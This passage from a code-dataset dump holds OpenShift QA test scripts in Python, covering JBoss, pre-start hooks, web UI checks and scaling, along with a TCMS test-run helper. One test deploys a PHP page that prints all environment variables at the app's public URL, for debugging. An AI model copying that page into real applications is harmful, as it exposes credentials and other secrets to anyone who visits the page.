suite = get_suite(conf)\n suite()\n\n#\n# end of jboss_env_vars.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5448225140571594, "alphanum_fraction": 0.5565313100814819, "avg_line_length": 27.46875, "blob_id": "249a1fc95b9029c733d512f1f1556580ad646020", "content_id": "c8de7d31bbc3cbe0525f8537fc7596d68edc3582", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2733, "license_type": "no_license", "max_line_length": 127, "num_lines": 96, "path": "/automation/open/testmodules/RT/cartridge/jgroups.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nAttila Nagy\[email protected]\nMay 4, 2012\n\n[US2114][rhc-cartridge] Update jboss-as7 
RPM to include jgroups update for clustering issues\n\"\"\"\n\nimport sys\nimport subprocess\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\nimport re\nfrom time import sleep\nfrom shutil import rmtree\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US2114][rhc-cartridge] Update jboss-as7 RPM to include jgroups update for clustering issues\"\n self.app_name = \"myjboss\" + common.getRandomString()\n\n common.env_setup(cleanup=True)\n\n def finalize(self):\n rmtree(self.app_name, ignore_errors = True)\n \nclass JGroupsTest(OpenShiftTest):\n \n def test_method(self):\n #\n # Step 1\n #\n self.info(\"---------------------------------\")\n self.info(\"1. Create a JBoss application\")\n self.info(\"---------------------------------\")\n ret_code = common.create_app(self.app_name, common.app_types[\"jbossas\"], clone_repo = True)\n self.assert_equal(ret_code, 0, \"Application must be created successfully\")\n\n #\n # Step 2\n #\n self.info(\"---------------------------------\")\n self.info(\"2. Deploy testing application\")\n self.info(\"---------------------------------\")\n ret_code = self.deploy_jgroups_testing_application(\"./\" + self.app_name)\n self.assert_equal(ret_code, 0, \"The application must be deployed successfully\")\n\n # Waiting for the application to stand up\n sleep(30)\n\n #\n # Step 3\n #\n self.info(\"---------------------------------\")\n self.info(\"3. Verify JGroups version number\")\n self.info(\"---------------------------------\")\n user = OSConf.OSConf()\n user.load_conf()\n app_cache = OSConf.get_apps(user)\n app_url = app_cache[self.app_name]['url']\n self.assert_true(\n int(common.fetch_page(app_url + \"/jgroups.jsp\")) > 6148,\n \"JGroups version must be higher than 3.0.4\"\n )\n\n self.passed(self.summary)\n\n\n def deploy_jgroups_testing_application(self, git_repo):\n\n deployment_steps = [\n \"cp -v %s/app_template/jgroups.jsp %s/src/main/webapp/\" % ( os.path.dirname(os.path.abspath(__file__)), git_repo ),\n \"cd %s\" % git_repo,\n \"git add .\",\n \"git commit -a -m testing\",\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(deployment_steps))\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JGroupsTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6099397540092468, "alphanum_fraction": 0.6199799180030823, "avg_line_length": 33.64347839355469, "blob_id": "446769bbb9ad6e7910e5471bb9f936b93d9a2867", "content_id": "06f4faa600c947093af86685d5c1d5cc1d2e5c9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3984, "license_type": "no_license", "max_line_length": 263, "num_lines": 115, "path": "/automation/open/bin/create_test_run.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\nsys.path.append(lib_path)\nfrom tcms import TCMS, TCMSException\n\n\ntcmsobj = None\n\n\t\n\n\ndef create_test_run(testrun_tag, tc_id_list, testplan_id):\n \"\"\"\n Create TCMS.TestRun according to tc_id_list.\n \"\"\"\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n test_run_summary = \"Openshift-%s-%s\" %(testrun_tag, timestamp)\n testrun_id = tcmsobj.create_testrun(test_run_summary, 
plan_id=testplan_id)['run_id']\n    # create_domain - 142463; clean_up - 146352\n    # These two cases must be added to the new test run as the first one and the last one.\n    #update_test_run(testrun_id, [142463])\n    update_test_run(testrun_id, tc_id_list) \n    #update_test_run(testrun_id, [146352])\n    return testrun_id\n    \ndef update_test_run(testrun_id, tc_id_list):\n    \"\"\"\n    Update TCMS.TestRun according to tc_id_list.\n    \"\"\"\n    if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n        tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n        return True\n    else:\n        print \"only list format is supported for test cases\"\n        return False\n\n\n\ndef main():\n    global tcmsobj\n\n    usage = \"\"\"\nusage: %s -t new_run_tag (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]\n\"\"\" %(os.path.basename(__file__))\n\n    from optparse import OptionParser\n    parser = OptionParser(usage=usage)\n    parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create a new test run with this tag\")\n    parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Use this existing test run that you want to run.\")\n    parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n    parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n    parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n\n    (options, args) = parser.parse_args()\n    #print \"-->\", options\n    #print \"-->\", args\n\n\n    testplan_id=options.testplan_id\n    \n\n    #Do TCMS authentication only once\n    tcmsobj = TCMS()\n\n    tc_id_list = []\n    tc_tag_list = []\n    if options.testcase_ids != None:\n        tmp_list = options.testcase_ids.split(',')\n        for i in tmp_list:\n            tc_id_list.append(int(i.strip()))\n    elif options.testcase_tags != None:\n        tmp_list = options.testcase_tags.split(',')\n        for i in tmp_list:\n            tc_tag_list.append(i.strip())\n    #print \"--->\", tc_tag_list\n\n\n\n    # Priority for test case filter arguments: -c -> -g\n    if options.testrun_tag != None: \n        if len(tc_id_list) != 0:\n            test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n            print \"test_run_id=%s\" %(test_run_id)\n        elif len(tc_tag_list) != 0:\n            tc_id_list = tcmsobj.get_testcase_id_list_by_tag(tc_tag_list, testplan_id)\n            test_run_id = create_test_run(options.testrun_tag, tc_id_list, testplan_id)\n            print \"test_run_id=%s\" %(test_run_id)\n        else:\n            print usage\n            raise Exception(\"Enter a test case id list using option '-c' or a test case tag list using option '-g'\")\n    else:\n        print usage\n        raise Exception(\"Create a new TCMS test run using option '-t'\")\n\n    return test_run_id\n\n\ndef error(msg):\n    print >> sys.stderr,\"ERROR: \",msg\n\ndef info(msg):\n    print >> sys.stderr,\"INFO: \",msg\n\ndef debug(msg):\n    print >> sys.stderr,\"DEBUG: \",msg\n\ndef debug2(msg):\n    print >> sys.stderr,\"DEBUG: \",msg\n\nif __name__ == \"__main__\":\n    main()\n" }, { "alpha_fraction": 0.5273402333259583, "alphanum_fraction": 0.5331908464431763, "avg_line_length": 33.18077087402344, "blob_id": "320f2da97d05014cc2442ac4def1b5c993027566", "content_id": "07bf075d67690cb62e50099002e6c1a5dd5d5947", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 8888, "license_type": "no_license", "max_line_length": 108, "num_lines": 260, "path": "/automation/open/testmodules/RT/cartridge/PreStartScript.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: PreStartScript.py\n# Date: 2012/07/26 15:03\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport re\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"[US2008][RT] Check running pre-start script\")\n self.timeout=5\n\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n\n try:\n self.cart_variant = self.config.tcms_arguments['cartridge']\n except:\n self.cart_variant = 'mysql'\n self.info(\"DB VARIANT: %s\"%self.cart_variant)\n\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.custom_app_vars={\n \"QE_ID_APP\": \"$(id)\",\n \"TESTING_STRING_%s\"%self.test_variant: 1,\n \"QE_APP\": 1\n }\n\n self.custom_cart_vars={\n \"QE_ID_CART\": \"$(id)\",\n \"MYSQL_PS1\": \"qashift \",\n \"TESTING_STRING_%s\"%self.cart_variant: 1,\n \"sleep\": \"$(sleep %s)\"%self.timeout,\n \"QE_CART\": 1\n }\n dict2list = lambda dic: [(k, v) for (k, v) in dic.iteritems()]\n\n self.custom_app_commands= \"\\n\".join(\n map(lambda item: (\"export %s=%s\"%(item[0],item[1])), dict2list(self.custom_app_vars)))\n self.custom_cart_commands= \"\\n\".join(\n map(lambda item: (\"export %s=%s\"%(item[0],item[1])), dict2list(self.custom_cart_vars)))\n #self.custom_cart_commands += \"\\nblabla\"\n\n self.hook_app_file = \"%s/.openshift/action_hooks/pre_start_%s\"%(\n self.app_name, common.app_types[self.test_variant])\n self.hook_cart_file = \"%s/.openshift/action_hooks/pre_start_%s\"%(\n self.app_name, common.cartridge_types[self.cart_variant])\n\n common.env_setup()\n\n\n def finalize(self):\n pass\n\n\nclass PreStartScript(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Create an app\", \n common.create_app,\n function_parameters=[self.app_name,\n common.app_types[self.test_variant],\n self.user_email, \n self.user_passwd, \n True],\n expect_return=0)\n\n self.add_step(\"Embed a cartridge\", \n common.embed,\n function_parameters=[self.app_name,\n \"add-%s\"%common.cartridge_types[self.cart_variant], \n self.user_email, \n self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Add pre-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return=0)\n\n self.add_step(\"Put the testing script online\",\n self.upload_checker_file,\n expect_return = True)\n\n #for app only\n self.add_step(\"Git add/commit/push [App+Cartridge]\",\n \"cd %s && git add . 
&& git commit -m new_files -a && git push\"%\n (self.app_name),\n expect_description = \"Only app hook should be executed\",\n expect_str = [ \n# \"blabla: command not found\", \n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the variables must be in rhcsh shell.\",\n expect_return=True)\n\n #add cartridge hook\n self.add_step(\"Add pre-start script for %s\"%self.cart_variant,\n \"echo '%s'> %s\"%\n (self.custom_cart_commands, self.hook_cart_file),\n expect_return=0)\n\n #for both of them...\n self.add_step(\"Git add/commit/push [BOTH]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Both hooks should be executed\",\n expect_str = [\n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the app+cart variables must be in rhcsh shell.\",\n expect_return=True)\n\n #only for CART, no PHP\n self.add_step(\"Remove APP pre-start script\",\n \"cd %s && git rm -f %s \"%(self.app_name, self.hook_app_file.replace(self.app_name,\".\")),\n expect_return=0)\n\n self.add_step(\"Git add/commit/push [CART]\",\n \"cd %s && git add . && git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be loaded\",\n expect_str = [\"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[self.app_name],\n try_count=3,\n expect_return=0)\n\n self.add_step(\"Check the output remotely\",\n common.run_remote_cmd_as_root,\n expect_description = \"`Timeout' warning message should be present in the output of libra start\",\n function_parameters=[\"/sbin/service libra restart | grep Timeout\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n function_parameters=[],\n expect_return=0)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"All of the app+cart variables must be in rhcsh shell.\",\n expect_return=True)\n\n self.custom_app_commands += \"\\nblabla\"\n\n self.add_step(\"Add pre-start script for %s\"%self.test_variant,\n \"echo '%s' > %s\"%\n (self.custom_app_commands, self.hook_app_file),\n expect_return=0)\n\n self.add_step(\"Git add/commit/push [APP+ERROR]\",\n \"cd %s && git add . 
&& git commit -m update_hooks -a && git push\"%\n (self.app_name),\n expect_description = \"Only cartridge hook should be loaded\",\n expect_str = [\n \"blabla: command not found\", \n \"remote: Done\"],\n expect_return=0)\n\n self.add_step(\"Check the app url\",\n common.check_web_page_output,\n expect_description = \"App shouldn't be accessible because of error\",\n function_parameters=[self.app_name],\n expect_return=1)\n\n self.add_step(\"Check the variables remotely [APP]\",\n self.check_variables,\n function_parameters=[self.custom_app_vars.keys()],\n expect_description = \"Shouldn't be accessible.\",\n expect_return=False)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def check_variables(self, *vars_to_check):\n app_url = OSConf.get_app_url(self.app_name)\n output = common.fetch_page(app_url+\"/checker.php\")\n for arr in vars_to_check:\n for var in arr:\n obj = re.search(r\"%s=\"%var, output)\n if not obj:\n self.error(\"Unable to find %s in environemnt\"%var)\n return False\n return True\n\n def upload_checker_file(self):\n fname = \"%s/php/checker.php\"%self.app_name\n checker = \"\"\"\n<?php\necho \"List of all \\$_ENV variables\\n\";\n\nforeach ($_ENV as $key => $val) {\n echo \"$key=$val\";\n}\n?>\n \"\"\"\n try:\n f = open(fname, \"wb\")\n f.write(checker)\n f.close()\n except:\n return False\n return True\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PreStartScript)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of PreStartScript.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6233766078948975, "alphanum_fraction": 0.6517857313156128, "avg_line_length": 20.224138259887695, "blob_id": "b80d33b30e1ec03cff5c5b3c794d371f4701be3c", "content_id": "f48ef323aba33c95fbcb8d2a0d30d90b16207583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1232, "license_type": "no_license", "max_line_length": 119, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/case_167511.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_167511.py\n# Date: 2012/08/13 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckCommunityLinkForUserAppRequest(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n \n #create a python app\n web.go_to_create_app(\"\")\n\n web.click_element_by_link_text(\"suggest or vote for it\")\n web.assert_text_equal_by_xpath('''Vote on Features''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''')\n\n\n self.tearDown()\n\n return self.passed(\" case_167511--CheckCommunityLinkForUserAppRequest passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckCommunityLinkForUserAppRequest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_167511.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7191780805587769, "alphanum_fraction": 0.7315068244934082, "avg_line_length": 25.071428298950195, "blob_id": 
"393efac695bc21a746fdfcd62ca01a79b51e75fb", "content_id": "07ba83b689cc74ec699e425bd73f5fd959594fd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 730, "license_type": "no_license", "max_line_length": 114, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/jbossews_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 6, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom jbossews_scaling_without_jenkins import EWSScalingHotDeployWithoutJenkins\n\nclass EWSScalingHotDeployWithJenkins(EWSScalingHotDeployWithoutJenkins):\n def __init__(self, config):\n EWSScalingHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2513] Hot deployment support for scalable application - with Jenkins - jbossEWS\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6509762406349182, "alphanum_fraction": 0.6804221868515015, "avg_line_length": 84.35134887695312, "blob_id": "c85479e5a0fa96bf1b25dc9dff8dc57116892a99", "content_id": "d5ba9e64f23e01130e3331de573f0747ad3724d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9475, "license_type": "no_license", "max_line_length": 483, "num_lines": 111, "path": "/automation/open/testmodules/UI/web/case_163035.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_163035.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Check_Cartridge_List(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Create duplicate domain\n web.go_to_developer()\n time.sleep(5)\n web.click_element_by_link_text(\"Platform Features\")\n time.sleep(5)\n web.assert_text_equal_by_xpath('''OpenShift Platform Features''', '''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.assert_text_equal_by_xpath('''OpenShift supports a wide list of application technologies. Each technology is delivered as a cartridge -- a pluggable capability you can add at any time. When you create an application you start with a web platform cartridge and then can add additional capabilities as you choose. Each cartridge runs on one or more gears depending on how high your application has been scaled.''', '''//div[@id='node-10863']/div/p''') \n web.assert_text_equal_by_xpath('''Web Cartridges''', '''//div[@id='node-10863']/div/h2''')\n web.assert_text_equal_by_xpath('''Web cartridges handle HTTP requests and serve web pages or business APIs. The OpenShift servers route traffic to your application's cartridge, and your code does the rest. 
If you need a place to store data, adding a database or NoSQL cartridge will automatically configure your web cartridge with the right access.''', '''//div[@id='node-10863']/div/p[2]''')\n web.click_element_by_link_text(\"JBoss Enterpise Application Platform 6.0\") \n time.sleep(2)\n web.check_title(\"OpenShift Resources for JBoss | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. Build and deploy enterprise Java in the cloud.''', '''//div[@id='node-10863']/div/table/tbody/tr/td[2]''')\n web.click_element_by_link_text(\"JBoss Application Server 7.1\")\n web.check_title(\"OpenShift Resources for JBoss | OpenShift by Red Hat\")\n web.go_back() \n web.assert_text_equal_by_xpath('''PHP 5.3''', '''//div[@id='node-10863']/div/table/tbody/tr[3]/td''') \n web.assert_text_equal_by_xpath('''PHP is a general-purpose server-side scripting language originally designed for Web development to produce dynamic Web pages. The mod_php Apache module is used to execute PHP applications. Popular development frameworks include: CakePHP, Symfony, and Code Igniter. Popular applications include: Drupal, Wordpress, and Mediawiki.''', '''//div[@id='node-10863']/div/table/tbody/tr[3]/td[2]''')\n web.assert_text_equal_by_xpath('''Python 2.6''', '''//div[@id='node-10863']/div/table/tbody/tr[4]/td''') \n web.assert_text_equal_by_xpath('''Python is a general-purpose, high-level programming language whose design philosophy emphasizes code readability. The Web Server Gateway Interface (WSGI) defines a simple and universal interface between web servers and web applications or frameworks for the Python programming language. Popular development frameworks include: Django, Bottle, Pylons, Zope and TurboGears.''', '''//div[@id='node-10863']/div/table/tbody/tr[4]/td[2]''')\n web.assert_text_equal_by_xpath('''Perl 5.10''', '''//div[@id='node-10863']/div/table/tbody/tr[5]/td''') \n web.assert_text_equal_by_xpath('''Perl is a high-level, general-purpose, interpreted, dynamic programming language. mod_perl is an optional module for the Apache HTTP server. It embeds a Perl interpreter into the Apache server, so that dynamic content produced by Perl scripts can be served in response to incoming requests, without the significant overhead of re-launching the Perl interpreter for each request.''', '''//div[@id='node-10863']/div/table/tbody/tr[5]/td[2]''')\n web.assert_text_equal_by_xpath('''Node.js 0.6''', '''//div[@id='node-10863']/div/table/tbody/tr[6]/td''') \n web.assert_text_equal_by_xpath('''Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices.''', '''//div[@id='node-10863']/div/table/tbody/tr[6]/td[2]''') \n web.assert_text_equal_by_xpath('''Ruby 1.9.3 and 1.8.7''', '''//div[@id='node-10863']/div/table/tbody/tr[7]/td''')\n web.assert_text_equal_by_xpath('''Ruby is a dynamic, reflective, general-purpose object-oriented programming language. Rack provides a minimal, modular and adaptable interface for developing web applications in Ruby. 
Popular development frameworks include: Ruby on Rails and Sinatra.''', '''//div[@id='node-10863']/div/table/tbody/tr[7]/td[2]''') \n web.assert_text_equal_by_xpath('''Do-It-Yourself''', '''//div[@id='node-10863']/div/table/tbody/tr[8]/td''')\n web.assert_text_equal_by_xpath('''The Do-It-Yourself (DIY) application type is a blank slate for trying unsupported languages, frameworks, and middleware on OpenShift. See the community site for examples of bringing your favorite framework to OpenShift.''', '''//div[@id='node-10863']/div/table/tbody/tr[8]/td[2]''')\n web.assert_text_equal_by_xpath('''Databases''', '''//div[@id='node-10863']/div/h2[2]''')\n web.go_back()\n web.assert_text_equal_by_xpath('''MongoDB is a scalable, high-performance, open source NoSQL database.''', '''//div[@id='node-10863']/div/table[2]/tbody/tr/td[2]''')\n web.assert_text_equal_by_xpath('''MySQL Database 5.1''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''MySQL is a multi-user, multi-threaded SQL database server.''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td[2]''')\n web.assert_text_equal_by_xpath('''MySQL Database 5.1''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''PostgreSQL Database 8.4''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[3]/td''')\n web.assert_text_equal_by_xpath('''PostgreSQL is an advanced Object-Relational database management system''', '''//div[@id='node-10863']/div/table[2]/tbody/tr[3]/td[2]''')\n web.assert_text_equal_by_xpath('''Administration''', '''//div[@id='node-10863']/div/h2[3]''')\n web.assert_text_equal_by_xpath('''phpMyAdmin 3.4''', '''//div[@id='node-10863']/div/table[3]/tbody/tr/td''') \n web.assert_text_equal_by_xpath('''Web based MySQL admin tool. Requires the MySQL cartridge to be installed first.''', '''//div[@id='node-10863']/div/table[3]/tbody/tr/td[2]''') \n web.assert_text_equal_by_xpath('''RockMongo 1.1''', '''//div[@id='node-10863']/div/table[3]/tbody/tr[2]/td''')\n web.assert_text_equal_by_xpath('''Web based MongoDB administration tool. Requires the MongoDB cartridge to be installed first.''', '''//div[@id='node-10863']/div/table[3]/tbody/tr[2]/td[2]''')\n web.assert_text_equal_by_xpath('''Developer Productivity''', '''//div[@id='node-10863']/div/h2[4]''')\n web.click_element_by_link_text(\"Jenkins Server\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Jenkins is a continuous integration (CI) build server that is deeply integrated into OpenShift. When you add Jenkins as an application you will enable your other applications to run complex builds whenever you push code. See the Jenkins info page for more.''', '''//div[@id='node-10863']/div/table[4]/tbody/tr/td[2]''')\n web.click_element_by_link_text(\"the Jenkins info page for more\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.click_element_by_link_text(\"Jenkins Client 1.4\")\n web.check_title(\"Build with Jenkins | OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''The Jenkins client connects to your Jenkins application and enables builds and testing of your application. 
Requires the Jenkins Application to be created via the new application page.''', '''//div[@id='node-10863']/div/table[4]/tbody/tr[2]/td[2]''')\n web.click_element_by_link_text(\"created via the new application page\")\n web.check_title(\"OpenShift by Red Hat\")\n web.go_back()\n web.assert_text_equal_by_xpath('''Cron 1.4''', '''//div[@id='node-10863']/div/table[5]/tbody/tr/td''') \n web.assert_text_equal_by_xpath('''The Cron cartridge allows you to run command line programs at scheduled times. Use this for background jobs and periodic processing.''', '''//div[@id='node-10863']/div/table[5]/tbody/tr/td[2]''') \n \n\n self.tearDown()\n\n return self.passed(\"Case 163035 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_Cartridge_List)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_163035.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.6037898659706116, "avg_line_length": 30.37837791442871, "blob_id": "b09cb5880be777ae5f74f2ae6b1da2ce5cfd8177", "content_id": "6fb16fc57d2344e733519561134d47c25b5385a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2322, "license_type": "no_license", "max_line_length": 93, "num_lines": 74, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_python.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Python framework\nhttps://tcms.engineering.redhat.com/case/122396/\n\"\"\"\nimport os,sys,re\nimport rhtest\n#import database\n# user defined packages\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase\nimport common\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1309][rhc-cartridge]Create local lib mirrors for Python framework\"\n self.app = { 'name':'pythontest', 'type':common.app_types['python'] }\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s; \"%(self.app['name']))\n\nclass LocalMirrorsPython(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Enable install_requires = ['Django>=1.3']\",\n \"sed -i '9s/^#//' %s/setup.py\" % self.app['name'],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git commit -am test && git push\" % self.app['name'],\n expect_string_list = ['Installed.+Django', 'Reading http.*python'],\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % 
self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(LocalMirrorsPython)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5467305779457092, "alphanum_fraction": 0.5580281019210815, "avg_line_length": 32.574710845947266, "blob_id": "e6d6fe49c7221385d163a8153cb6626b68559b70", "content_id": "9401d7efa511e8646c641fa8884832aa7445cfb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2921, "license_type": "no_license", "max_line_length": 141, "num_lines": 87, "path": "/automation/open/testmodules/RT/cartridge/scaling_min_gears.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n[US2282][BusinessIntegration] MIN_GEAR setting in cartridge [jbossas]\nhttps://tcms.engineering.redhat.com/case/173957/\n\"\"\"\n\nimport rhtest\nimport common\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    ITEST = \"DEV\"\n\n    def initialize(self):\n        try:\n            self.app_type = self.get_variant()\n        except:\n            self.app_type = 'php'\n        self.app_name = common.getRandomString(10)\n        self.summary = 